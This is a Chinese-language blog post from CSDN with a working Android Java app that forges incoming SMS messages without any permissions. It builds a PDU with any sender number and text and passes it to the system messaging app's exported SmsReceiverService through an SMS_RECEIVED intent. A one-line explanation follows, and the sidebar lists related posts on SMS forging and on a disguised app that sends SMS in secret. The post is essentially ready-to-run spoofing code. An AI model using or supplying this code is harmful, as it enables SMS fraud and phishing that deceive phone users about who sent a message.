android 无权限 伪造短信

最新推荐文章于 2023-05-19 16:04:57 发布
最新推荐文章于 2023-05-19 16:04:57 发布
阅读量141 收藏
点赞数
分类专栏: android基础知识 文章标签: 移动开发 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waterseason/article/details/84487588
版权
代码实现 

package com.smstrick;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

public class SMSTrickActivity extends Activity implements OnClickListener{
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);

        View continue_button = this.findViewById(R.id.button1);

        continue_button.setOnClickListener((OnClickListener) this);
    }
    public void onClick(View v) {
    	EditText eNum;
    	EditText eMsg;
    	String sNum;
    	String sMsg;

    	eNum   = (EditText)findViewById(R.id.editText1);
    	eMsg   = (EditText)findViewById(R.id.editText2);

    	sNum = eNum.getText().toString();
    	sMsg = eMsg.getText().toString();



    	//sNum cannot be blank
    	if(sNum.equals("")) sNum = "123456";

    	createFakeSms(this.getApplicationContext(),sNum,sMsg);

    }

    private static void createFakeSms(Context context, String sender, String body) {
    //Source: http://stackoverflow.com/a/12338541
    //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        byte[] pdu = null;
        byte[] scBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD("0000000000");
        byte[] senderBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD(sender);
        int lsmcs = scBytes.length;
        byte[] dateBytes = new byte[7];
        Calendar calendar = new GregorianCalendar();
        dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
        dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
        dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
        dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
        dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
        dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
        dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
                .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
        try {
        	Log.d("ice", "test one");
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            bo.write(lsmcs);
            bo.write(scBytes);
            bo.write(0x04);
            bo.write((byte) sender.length());
            bo.write(senderBytes);
            bo.write(0x00);
            bo.write(0x00); // encoding: 0 for default 7bit
            bo.write(dateBytes);
            try {

                String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
                Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
                Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
                        "stringToGsm7BitPacked", new Class[] { String.class });
                stringToGsm7BitPacked.setAccessible(true);
                byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
                        body);
                bo.write(bodybytes);
            } catch (Exception e) {
            	e.printStackTrace();
            }

            pdu = bo.toByteArray();
        } catch (IOException e) {
        	e.printStackTrace();
        }

        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);
    }

    private static byte reverseByte(byte b) {
        return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
    }
}

实质分析 核心在于自定义了系统的 
        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);

收到短信的intent,从而伪造了短信,而且不需要任何的权限。
{丸の子}
关注
专栏目录
Android 系统的安全性分析(6)--Android应用层权限的讨论
Android系统工程师--小馬佩德罗
04-13 772
最近工作上涉及到对Android系统安全性的改造,在改造之前先分析整理下目前Android系统自身的安全性; 参考了一些文章及书籍,在这里大部分是对别人描述的提炼,我挑出一些对我有用的内容整理; 如果你是一个APP开发者,想更深入了解Android权限机制,会对此篇更感兴趣。
Android应用安全测试用例
武天旭的博客
12-09 1201
前言 自从写了移动安全专栏,经常有小伙伴问有没有APP安全测试用例(俗称checklist),这个当然是有的啦!只是博主觉得测试用例这个东西,属于最基本的常识,就不在这里写了。另外,如果真的从内向外懂移动安全技术的话,测试用例这东西也就是一个自然而然的东西。
Android 伪造短信
云守护的专栏
03-26 3018
//伪造短信到系统信箱 private static void createFakeSms(Context context, String sender, String body) { byte[] pdu = null; byte[] scBytes = PhoneNumberUtils .networkPortionToCalledPartyBCD("000000000
Android的基本常用的短信操作
nodie的专栏
05-11 5251
<br />1、调用系统发送短信界面(传入手机号码+短信内容) <br />2、隐藏发送短信(指定号码指定内容)(这里隐藏只是没有反写入数据库)<br /><br />3、获得收件箱接收到的短信<br /><br />4、Android屏蔽新短信通知提示信息:(ContentObserver)<br /><br />4、删除刚接收到的短信:<br /><br />      A)、带提示删除<br /><br />        B)、无新短信通知=删除短信<br /><br /><br /><br /><
Android发送短信最简单代码实现
最新发布
weixin_58814750的博客
05-19 3221
Android发送短信最简单代码实现,发送短信原理,接收不到短信原因汇总,smsmanager的使用,广播查看短信发送状态
一个半成小作品-短信伪造
08-28 199
代码其实很简单,实现功能也很简单,目前已实现功能: 1、可以设置短信延迟时间 2、有声音、震动提示 3、实现状态栏无法删除,只能点开后删除 4、实现状态栏提示 5、实现点击运行后App窗口自动关闭 但仍然遗留有问题: 1、状态栏点击提示后无法转到系统收件箱界面 2、在双卡双待手机里面短信下面无法标识号码归属地 相关源码: java: package com....
xposed伪造收到短信
Peter_1225的博客
03-19 2102
Android 4.4 之后,开发者不能直接往短信数据库添加短信了,只有系统默认的短信应用才能在收件箱中添加短信,除非将自己的应用设置为默认短信应用,当这种方法不太实用,因为没有那个用户愿意修改自己的默认短信应用,即便是临时的也不靠谱。爬了一堆坑之后勉强找到一个行之有效的方法。思路在不改变默认短信的情况下,通过发送广播,告诉短信应用收到短信了,然后再通过xposed劫持短信内容intent里的参数...
Android6.0短信装逼生成器
热门推荐
u011767404的博客
03-23 1万+
android 6.0 自己写短信
短信生成神器
09-19
短信生成神器,解决了android4.4写短信权限的问题, 可自动生成内容,也可以写动输入内容,可随机生成收发件箱也可选择,还可选汉语或英文字母,用以测试短信的备份还方便
Android4.4 往短信收件箱中插入自定义短信伪造短信
weixin_33744141的博客
08-13 474
这段时间稍微有点空闲,把前一段学习Android做过的一些小项目整理整理。虽然没有什么工程量很大的项目,但是对于一个新手,解决这些问题还是花了一段时间。感觉还是非常有记录的意义呢~~~么么哒*—* 今天要说明的这个项目,是要在Android手机里伪造一条短信,也就是在短信箱中插入一条自定义的短信,看上去就像自己的手机里收到了新的信息,但其实这并不是一条通过通信运营商的网络发过来的信息,这是一条假...
android手机短信诈骗原理,安卓系统均存短信欺诈漏洞 专家:系统先天不足
weixin_36333534的博客
05-25 425
国际在线报道:据国外媒体11月5号报道,美国北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中侯晨 发现了一个存在于安卓平台的“短信欺诈”漏洞,可能会使众多使用该平台的用户受到影响。什么是“短信欺诈”漏洞,它会造成什么影响?作为普通用户我们又应当如何防范呢?首先我们通过一个声音短片来了解一下这次新发现的漏洞。研究人员称,“短信欺诈”漏洞可以允许各种应用在安卓平台上进行短信伪装,且在所...
Android下实现假短信功能
Abner-L
06-02 1419
为实现
android删除短信(绕过权限)
a468903507的专栏
05-03 2116
android的很多功能都是需要权限才能操作,还是有很多功能我们是可以直接操作的,只需要在配置文件中注明权限就行了,可是有些虽然注明了权限,但是还是会提示说你没权限。比如删除短信、让手机进入休眠状态(gotoSleep)。下面就介绍一下我是如何删除一条属于黑名单中的短信:                  1、获取你想要删除的短信的线程ID(因为我想删除最近收到的一条短信,所以我只需按时间进
Android之伪装QQ后台偷偷发短信
回忆的夏天
08-06 2708
安卓的安全性一直为人所诟病,安卓也早已经成为了最受恶意软件青睐的移动平台。不过,这次,我们还真是做一个类似小病毒的软件(不是让你做来害人的,不过别人也没那么笨),(千万别在真机测试)而是顺便提醒你不要使用来历不明的apk安装包。那这一个小软件,什么原理呢?我们都用过QQ,刚打开QQ的时候,会看到QQ占满了整个屏幕,然后再到主页面,我们就是用这个瞬间来发短信,QQ只是一个小例子,假设一个软件(先不说...
Context-Intent
weixin_42547039的博客
10-28 191
Context Context是维持Android程序中各组件能够正常工作的一个核心功能类 ontext在加载资源、启动Activity、获取系统服务、创建View等操作都要参与 ntext提供了关于应用环境全局信息的接口 个activity和service以及application的context都是一个新的contextImpl对象 ext数量等于activity个数+service个数+1/application 在应用之间,应用内部组件之间的交互和数据传递 根据intent的描述,找到对应的组件
保护你的隐私,五种控制Android应用的权限的方法
贾博士的专栏
02-11 2304
这篇文章目的在于介绍Android系统上控制权限的方法,读者只要使用过Android,或是对智能机平台有所了解,就能看懂,不需要专门的编程知识。   1  为什么Android总是事无巨细地告诉你应用索取的每一项权限?   相比Apple,Microsoft严格控制生态系统(从苹果给开发者的"App Store Guideline"可见一斑),只允许通过官方应用商店安装应用,并对每份上
Android权限配置详解与使用
9. **其他未列出的权限同样重要,比如发送短信、读写联系人、录音、拍照等,都是Android应用可能需要的权限。** 理解并正确使用这些权限Android开发者来说至关重要,一方面可以确保应用的功能正常运行,另一方面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值